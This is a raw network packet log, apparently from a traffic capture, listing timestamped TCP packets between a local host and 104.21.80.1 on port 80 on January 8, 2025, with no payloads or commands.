Jan 8, 2025 08:46:32.728712082 CET	80	50045	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:32.728770971 CET	50045	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:32.735523939 CET	50045	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:32.740339994 CET	80	50045	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:33.283407927 CET	80	50045	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:33.283461094 CET	50045	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:34.790342093 CET	50045	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:34.790649891 CET	50046	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:34.795434952 CET	80	50045	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:34.795489073 CET	50045	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:34.795490980 CET	80	50046	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:34.795561075 CET	50046	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:34.796565056 CET	50046	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:34.801400900 CET	80	50046	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:35.449184895 CET	80	50046	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:35.452678919 CET	50046	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:37.119177103 CET	50046	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:37.119595051 CET	50047	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:37.124197960 CET	80	50046	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:37.124258041 CET	50046	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:37.124409914 CET	80	50047	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:37.124478102 CET	50047	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:37.124619961 CET	50047	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:37.130475998 CET	80	50047	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:37.860440969 CET	80	50047	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:37.860635042 CET	50047	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:39.368074894 CET	50047	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:39.368074894 CET	50048	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:39.373075962 CET	80	50048	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:39.373203993 CET	80	50047	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:39.375153065 CET	50048	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:39.375155926 CET	50047	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:39.386770010 CET	50048	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:39.391545057 CET	80	50048	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:40.013513088 CET	80	50048	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:40.014662981 CET	50048	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:41.633491039 CET	50048	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:41.634552002 CET	50049	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:41.638601065 CET	80	50048	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:41.639349937 CET	80	50049	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:41.639470100 CET	50048	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:41.639487982 CET	50049	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:41.639642954 CET	50049	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:41.644390106 CET	80	50049	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:42.269740105 CET	80	50049	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:42.269872904 CET	50049	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:43.802089930 CET	50049	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:43.802588940 CET	50050	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:43.807192087 CET	80	50049	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:43.807430029 CET	80	50050	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:43.807516098 CET	50049	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:43.810821056 CET	50050	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:43.862874031 CET	50050	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:43.867733002 CET	80	50050	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:44.462680101 CET	80	50050	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:44.462732077 CET	50050	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:46.118366957 CET	50050	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:46.118952036 CET	50051	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:46.123514891 CET	80	50050	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:46.123619080 CET	50050	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:46.123831987 CET	80	50051	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:46.123946905 CET	50051	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:46.124140024 CET	50051	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:46.128916025 CET	80	50051	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:46.756897926 CET	80	50051	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:46.756961107 CET	50051	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:48.275198936 CET	50051	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:48.275533915 CET	50052	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:48.280386925 CET	80	50052	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:48.280478001 CET	50052	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:48.280689955 CET	50052	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:48.280889988 CET	80	50051	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:48.281014919 CET	50051	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:48.285437107 CET	80	50052	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:48.954159021 CET	80	50052	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:48.954267979 CET	50052	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:50.587490082 CET	50052	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:50.588007927 CET	50053	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:50.592602968 CET	80	50052	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:50.592659950 CET	50052	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:50.592834949 CET	80	50053	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:50.592901945 CET	50053	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:50.593051910 CET	50053	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:50.597771883 CET	80	50053	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:51.148322105 CET	80	50053	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:51.148475885 CET	50053	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:52.686657906 CET	50053	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:52.687191963 CET	50054	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:52.691782951 CET	80	50053	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:52.691837072 CET	50053	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:52.692013025 CET	80	50054	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:52.692070961 CET	50054	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:52.692282915 CET	50054	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:52.697144985 CET	80	50054	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:53.322114944 CET	80	50054	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:53.322220087 CET	50054	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:55.008467913 CET	50054	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:55.008871078 CET	50055	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:55.013637066 CET	80	50054	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:55.013655901 CET	80	50055	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:55.013695955 CET	50054	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:55.013747931 CET	50055	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:55.013951063 CET	50055	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:55.018693924 CET	80	50055	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:55.671662092 CET	80	50055	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:55.671736002 CET	50055	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:57.180927038 CET	50055	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:57.181298018 CET	50056	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:57.186156988 CET	80	50056	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:57.186172009 CET	80	50055	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:57.186232090 CET	50055	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:57.186243057 CET	50056	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:57.186420918 CET	50056	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:57.191147089 CET	80	50056	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:57.840380907 CET	80	50056	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:57.840459108 CET	50056	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:59.461317062 CET	50056	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:59.464519978 CET	50057	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:59.466454983 CET	80	50056	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:59.467012882 CET	50056	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:59.469427109 CET	80	50057	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:59.472703934 CET	50057	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:59.476527929 CET	50057	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:59.481323004 CET	80	50057	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:00.166419029 CET	80	50057	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:00.168601036 CET	50057	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:01.680525064 CET	50057	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:01.680526018 CET	50058	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:01.685473919 CET	80	50058	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:01.685739040 CET	80	50057	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:01.685841084 CET	50058	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:01.685842991 CET	50057	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:01.686073065 CET	50058	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:01.690874100 CET	80	50058	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:02.336062908 CET	80	50058	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:02.336147070 CET	50058	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:03.961539030 CET	50058	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:03.961894035 CET	50059	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:03.966797113 CET	80	50059	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:03.966837883 CET	80	50058	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:03.966916084 CET	50059	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:03.966978073 CET	50058	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:03.967138052 CET	50059	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:03.971877098 CET	80	50059	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:04.610625029 CET	80	50059	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:04.610691071 CET	50059	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:06.133744955 CET	50059	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:06.133748055 CET	50060	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:06.138559103 CET	80	50060	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:06.138660908 CET	50060	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:06.138837099 CET	50060	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:06.138926029 CET	80	50059	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:06.139056921 CET	50059	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:06.143600941 CET	80	50060	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:06.771224022 CET	80	50060	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:06.771295071 CET	50060	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:08.424429893 CET	50060	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:08.424866915 CET	50061	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:08.429469109 CET	80	50060	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:08.429524899 CET	50060	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:08.429734945 CET	80	50061	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:08.429800034 CET	50061	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:08.430006981 CET	50061	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:08.434768915 CET	80	50061	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:09.056909084 CET	80	50061	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:09.056998014 CET	50061	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:10.582659006 CET	50061	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:10.583184004 CET	50062	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:10.587752104 CET	80	50061	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:10.587811947 CET	50061	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:10.588032961 CET	80	50062	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:10.588102102 CET	50062	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:10.588701963 CET	50062	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:10.593553066 CET	80	50062	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:11.229614973 CET	80	50062	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:11.229677916 CET	50062	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:12.852164984 CET	50062	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:12.852571964 CET	50063	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:12.857372999 CET	80	50063	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:12.857398987 CET	80	50062	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:12.857454062 CET	50063	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:12.857482910 CET	50062	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:12.857634068 CET	50063	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:12.862418890 CET	80	50063	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:13.491180897 CET	80	50063	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:13.491323948 CET	50063	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:15.009068966 CET	50064	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:15.009072065 CET	50063	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:15.014832973 CET	80	50064	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:15.014919996 CET	50064	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:15.014988899 CET	80	50063	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:15.015047073 CET	50064	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:15.015048027 CET	50063	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:15.019862890 CET	80	50064	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:15.677457094 CET	80	50064	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:15.677545071 CET	50064	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:17.305901051 CET	50064	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:17.306277037 CET	50065	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:17.311198950 CET	80	50065	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:17.311214924 CET	80	50064	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:17.311304092 CET	50065	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:17.311336040 CET	50064	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:17.311474085 CET	50065	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:17.316418886 CET	80	50065	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:17.966834068 CET	80	50065	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:17.968671083 CET	50065	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:19.477406025 CET	50066	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:19.477406979 CET	50065	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:19.482235909 CET	80	50066	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:19.482419968 CET	80	50065	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:19.482788086 CET	50065	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:19.482789040 CET	50066	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:19.486701965 CET	50066	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:19.491555929 CET	80	50066	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:20.142399073 CET	80	50066	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:20.143399000 CET	50066	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:21.774137020 CET	50067	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:21.774139881 CET	50066	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:21.779011011 CET	80	50067	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:21.779141903 CET	50067	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:21.779148102 CET	80	50066	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:21.779207945 CET	50067	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:21.779280901 CET	50066	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:21.788938046 CET	80	50067	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:22.416116953 CET	80	50067	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:22.416181087 CET	50067	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:23.930286884 CET	50067	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:23.930788040 CET	50068	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:23.935260057 CET	80	50067	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:23.935379028 CET	50067	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:23.935607910 CET	80	50068	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:23.938659906 CET	50068	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:23.938900948 CET	50068	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:23.943705082 CET	80	50068	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:24.585119009 CET	80	50068	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:24.585179090 CET	50068	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:26.230142117 CET	50068	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:26.230577946 CET	50069	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:26.235177994 CET	80	50068	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:26.235362053 CET	50068	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:26.235405922 CET	80	50069	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:26.235506058 CET	50069	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:26.236154079 CET	50069	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:26.241035938 CET	80	50069	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:26.799917936 CET	80	50069	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:26.799988031 CET	50069	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:28.305900097 CET	50070	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:28.305902004 CET	50069	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:28.310770035 CET	80	50070	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:28.310946941 CET	80	50069	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:28.311043978 CET	50069	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:28.311111927 CET	50070	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:28.312567949 CET	50070	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:28.317383051 CET	80	50070	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:28.946984053 CET	80	50070	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:28.947051048 CET	50070	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:30.728621960 CET	50070	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:30.728909016 CET	50071	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:30.733638048 CET	80	50070	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:30.733688116 CET	80	50071	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:30.733699083 CET	50070	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:30.733741999 CET	50071	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:30.733923912 CET	50071	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:30.738714933 CET	80	50071	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:31.371124029 CET	80	50071	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:31.371197939 CET	50071	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:32.884388924 CET	50071	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:32.884823084 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:32.889426947 CET	80	50071	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:32.889547110 CET	50071	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:32.889678001 CET	80	50072	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:32.889746904 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:32.889921904 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:32.894653082 CET	80	50072	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:33.532941103 CET	80	50072	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:33.540648937 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:33.664865971 CET	80	50072	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:33.664985895 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:35.290335894 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:35.290679932 CET	50073	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:35.295320988 CET	80	50072	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:35.295382023 CET	50072	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:35.295434952 CET	80	50073	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:35.295511007 CET	50073	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:35.295711040 CET	50073	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:35.300486088 CET	80	50073	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:35.924393892 CET	80	50073	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:35.924508095 CET	50073	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:37.430627108 CET	50073	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:37.430629969 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:37.435538054 CET	80	50074	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:37.435750008 CET	80	50073	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:37.435868025 CET	50073	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:37.435873032 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:37.436069012 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:37.440871954 CET	80	50074	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:38.069399118 CET	80	50074	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:38.069521904 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:38.199882030 CET	80	50074	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:38.201426983 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:39.820940018 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:39.821225882 CET	50075	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:39.826040983 CET	80	50075	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:39.826245070 CET	80	50074	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:39.826335907 CET	50075	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:39.826354980 CET	50074	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:39.826623917 CET	50075	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:39.832873106 CET	80	50075	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:40.452537060 CET	80	50075	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:40.452586889 CET	50075	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:41.961908102 CET	50075	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:41.962157011 CET	50076	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:41.966933012 CET	80	50076	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:41.967035055 CET	50076	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:41.967061043 CET	80	50075	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:41.967153072 CET	50075	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:41.967251062 CET	50076	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:41.971988916 CET	80	50076	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:42.608059883 CET	80	50076	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:42.608124018 CET	50076	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:44.286190033 CET	50077	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:44.286225080 CET	50076	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:44.291093111 CET	80	50077	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:44.291363955 CET	80	50076	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:44.291461945 CET	50076	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:44.291479111 CET	50077	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:44.295206070 CET	50077	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:44.300076962 CET	80	50077	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:44.854605913 CET	80	50077	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:44.854656935 CET	50077	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:46.368124008 CET	50077	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:46.368135929 CET	50078	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:46.372924089 CET	80	50078	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:46.373086929 CET	80	50077	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:46.376669884 CET	50077	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:46.376693964 CET	50078	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:46.376808882 CET	50078	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:46.381582975 CET	80	50078	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:47.007442951 CET	80	50078	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:47.007518053 CET	50078	80	192.168.2.5	104.21.80.1
